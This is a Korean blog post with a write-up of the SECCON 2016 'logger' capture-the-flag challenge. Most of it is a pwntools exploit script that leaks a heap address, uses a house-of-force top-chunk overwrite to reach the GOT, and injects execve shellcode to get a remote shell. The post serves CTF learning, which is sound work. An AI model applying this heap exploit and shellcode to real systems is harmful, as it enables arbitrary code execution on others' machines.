top chunk를 ffffffffffffffff로 덮고 다음 malloc할때 got부분을 할당받으면 된다
1 2 3 4 | 0x00400000 0x00402000 r-xp /root/logger 0x00601000 0x00602000 r-xp /root/logger 0x00602000 0x00603000 rwxp /root/logger 0x00603000 0x00624000 rwxp [heap] | cs |
heap의 권한이 rwxp이기때문에 힙에다 쉘코드를 넣으면 된다
2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 | from pwn import * elf = "/root/pwn/seccon/logger" #lib32 = "/root/pwn/seccon/libc-2.19.so-c4dc1270c1449536ab2efbbe7053231f1a776368" #lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so" # s = process(elf) # s1 = process(elf) s = remote('logger.pwn.seccon.jp',6565) s1 = remote('logger.pwn.seccon.jp',6565) e = ELF(elf) #l = ELF(lib32) DEBUG = 0 if DEBUG > 0: print "PID : %d" % util.proc.pidof(s)[0] if DEBUG == 2: context.log_level = 'debug' uid = str(time.time()) #uid = "debug" s.recvuntil("exit") s.sendline("1") s.sendline(uid) s.sendline(uid) s.recvuntil("exit") print "[*] id : %s" % uid s1.sendline("1") s1.sendline(uid) s1.sendline(uid) def read(ss): ss.sendline("1") return ss.recvuntil("exit").split("1. Read log")[0] def append(ss,size,data): ss.sendline("2") ss.recvuntil("128byte") ss.sendline(str(size)) ss.sendline(data) ss.recvuntil("exit") def leak(ss): ss.sendline("3") ss.recvuntil("filename: ") ss.recv(32) t = ss.recvuntil("=")[:-1] t += ("\x00" * (8-len(t))) ss.recvuntil("exit") return t #buf = malloc(file_size) leak heap_addr = u64( leak(s) ) print "[*] LEAK_HEAP : %x" % heap_addr #house of force #topchunk = ffffffffffffffff append(s1,32,"\xff"*32) read(s) offset = 0x602050 - 0x28 - heap_addr# - (32+16) print "[*] offset : %d" % offset #append(s,"%d"%offset,"A") append(s,"%d"%offset,"") #got Overwrite s.sendline("2") s.sendline("128") #http://shell-storm.org/shellcode/files/shellcode-806.php sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" sc = "\x90"*(0x40-len(sc)) + sc sc += p64(0x602080) s.sendline(sc) s.interactive() | cs |
'CTF' 카테고리의 다른 글
codegate 2017 (0) | 2017.02.11 |
---|---|
SECCON_2016 cheer (0) | 2016.12.11 |
SECCON_2016 checker (0) | 2016.12.11 |
SECCON_2016 jmper (0) | 2016.12.11 |